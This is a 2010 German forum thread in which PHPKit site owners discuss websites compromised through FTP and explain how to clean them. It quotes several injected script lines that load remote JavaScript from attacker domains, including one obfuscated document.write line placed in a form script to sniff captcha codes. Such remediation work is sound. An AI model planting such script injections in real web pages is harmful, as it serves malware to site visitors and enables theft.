Angriff auf versch. Webseiten (via FTP)

Forum Partner+Friends LinkUs Downloads KNW Suche TS³ Viewer Twitter Facebook

Sie sind nicht angemeldet. Anmelden

1
2
3
4
5
6
7
…
- 8
- 9
10

tanga

ist gerade angekommen

Beiträge: 2

Geschlecht: Weiblich

PHPKIT Version: 1.6.5

Dienstag, 15. Juni 2010, 20:46

ja da und einer war auch in der pksm/index.php

aber lädt immer noch die babes kram irgendwo sitzzt da noch welche

Headless

... nur noch zur deko

Beiträge: 2 374

Geschlecht: Männlich

Wohnort: Nürnberg

PHPKIT Version: keine

Dienstag, 15. Juni 2010, 20:52

@tanga:
Mach einen eigenen Thread dafür auf - dann helfen wir dir. Das gehört in einen extra Thread.

BTW:
Ich ändere den Threadtitel und schiebe den Thread in die Plauerecke da es nichts mit pkSM oder dem Kit zu tun hatte.

Zum Thread:
Sowas in der Art dachte ich mir am Schluss schon, denn es war in den Logs 0 zu finden weder in denen von pkSM noch in den Apache Logs.
Haben die Jungs von All-Inkl genauere Infos rausgegeben?

Grüße

So einfach wie möglich - aber nicht einfacher!
Albert Einstein (1879-1955)

reddevil82

BFM Stream Cheffe

Beiträge: 1 712

Geschlecht: Männlich

PHPKIT Version: 1.6.5

Dienstag, 15. Juni 2010, 21:08

Leiche hat mit denen telefoniert und ich wiederrum mit Leiche.

Also kann Euch Leiche das telefonat genauerer erklären wie ich.

Ich konnte mir am Ende auch nur noch das vorstellen das es am Anbieter lag.

Zum Thema säubern:

Am einfachsten ist es ihr ladet Weaverslave herunter.

Danach alle Daten von FTP auf Festplatte laden

Danach in allen Ordner nach:

	Javascript-Quelltext
1	<script type="text/javascript" src="http://inc.chubbyblondebabes.com/HDTV.js"></script>

suchen und dies automatisch ersetzen mit NIX

Aufpassen bei manchen heisst die Datei nicht HDTV.js

Dann einfach nach

	Javascript-Quelltext
1	<script type="text/javascript" src="http://inc.chubbyblondebabes.com

suchen und den entsprechenden Inhalt komplett zwischen <script> und </script> löschen

Hauptsächlich sind index.php, index.htm oder html betroffen desweiteren bei manchen noch die default.php, main.php und soweit bekannt alle *.js Dateien

Danach alles wieder aufspielen und Passwörter ändern ( DB nicht vergessen )

Bei speziellen Fragen dazu bitte nen neuen Thread aufmachen sonst wird es hier zu unübersichtlich.

Danke

Edit:

Weitere mögliche Codes:

	Javascript-Quelltext
1 2	<script type="text/javascript" src="http://inc.chubbyblondebabes.com/GUI.js"></script> <!--5c03f1d4815e48eef7004ae5ec0a95ad-->

Seit 02.07.2010 Papa einer süssen Tocher !!!!

http://www.burnerfm.de

Mit den besten Hits der 80´s, 90´s und von heute. Plus einigen PHPKit Addons... uvm.

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »reddevil82« (16. Juni 2010, 01:19)

"Sascha"

"HellBoY the KiT"

Beiträge: 492

Geschlecht: Männlich

Wohnort: 63263 Neu-Isenburg

PHPKIT Version: 1.6.5

Mittwoch, 16. Juni 2010, 00:53

Zwei Testkits waren bei mir auch betroffen sind aber schon wieder clean

hatte auch diesen code drin

	HTML
1 2	<script type="text/javascript" src="http://gooaogioy.owensomebody.com:8080/Page_View.js"></script> <!--2e84f33d75cac544f33df85d4b9768d5-->

Headless

... nur noch zur deko

Beiträge: 2 374

Geschlecht: Männlich

Wohnort: Nürnberg

PHPKIT Version: keine

Mittwoch, 16. Juni 2010, 12:53

Wirklich eine kuriose Geschichte das ganze ... naja dann hoffen wir mal das es nicht wieder passiert

Grüße

So einfach wie möglich - aber nicht einfacher!
Albert Einstein (1879-1955)

Lazarus

ist gerade angekommen

Beiträge: 0

Geschlecht: Männlich

Wohnort: Unterammergau

PHPKIT Version: 1.6.5

Mittwoch, 16. Juni 2010, 13:50

re:

Hallo...

die von lcl-online.de haben wohl das gleiche Problem... Kaspersky lädt nicht mal mehr die Seite...

Grüße Lazarus

"Sascha"

"HellBoY the KiT"

Beiträge: 492

Geschlecht: Männlich

Wohnort: 63263 Neu-Isenburg

PHPKIT Version: 1.6.5

Mittwoch, 16. Juni 2010, 14:15

Habe noch was gefunden wenn der Captcha nicht wieder geht in der fx/form.js wurde auch eine zeile (Zeile12) hinzugefügt. der die Captcha codes schnifft das Bots wieder spammen können.
Löscht diese Zeile raus dann ist wieder alles beim alten.

	HTML
1	document.write('<s'+'cript type="text/javascript" src="http://inc.chubbyblondebabes.com/Beta_Software.js"></scr'+'ipt>');

jup beim BuLeTT steht das im Quellcode drin:

	HTML
1 2	<script type="text/javascript" src="http://inc.chubbyblondebabes.com/HDTV.js"></script> <!--b275a4296a034ddd35f6b98e6d7b8633-->

TS-Jan

unregistriert

Mittwoch, 16. Juni 2010, 15:00

RE: re:

Zitat von »Lazarus«

Hallo...

die von lcl-online.de haben wohl das gleiche Problem... Kaspersky lädt nicht mal mehr die Seite...

Grüße Lazarus

Bei lcl-online springt mein Anti-Viren-System auch an. Aber nur an All-inkl kann es ja nicht liegen! lcl-online ist nicht bei All-inkl, tanga ebenfalls nicht...

Scholle

postet ab und an hier

Beiträge: 210

Geschlecht: Männlich

Wohnort: Münster

PHPKIT Version: 1.6.5

Mittwoch, 16. Juni 2010, 15:17

ich bin bei all inkl. und bei mir ist es nicht ;P

soweit ich weiß, ist Bullet aber bei All inkl. ...

Sämtliche Rechtschreibfehler sind beabsichtigt und dienen der allgemeinen Belustigung.

Muetze

Ein Pazifist mit der Waffe in der Hand

Beiträge: 681

Geschlecht: Männlich

Wohnort: zu Hause

PHPKIT Version: 1.6.5

Mittwoch, 16. Juni 2010, 15:22

Es ist nicht nur bei All Ink passiert, kenne eine weitere Person, die nicht bei All Ink ist & war auch betroffen.

Es geht nicht darum zu haben was man will, sondern zu schätzen was man hat!
Blutrausch HP
Mauern sind auch nur Steine & Wassertropen können auch mal Wassermengen werden!

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Muetze« (16. Juni 2010, 16:40)

1
2
3
4
5
6
7
…
- 8
- 9
10

Angriff auf versch. Webseiten (via FTP)

Javascript-Quelltext

Javascript-Quelltext

Javascript-Quelltext

HTML

re:

HTML

HTML

RE: re:

Zitat von »Lazarus«

Ähnliche Themen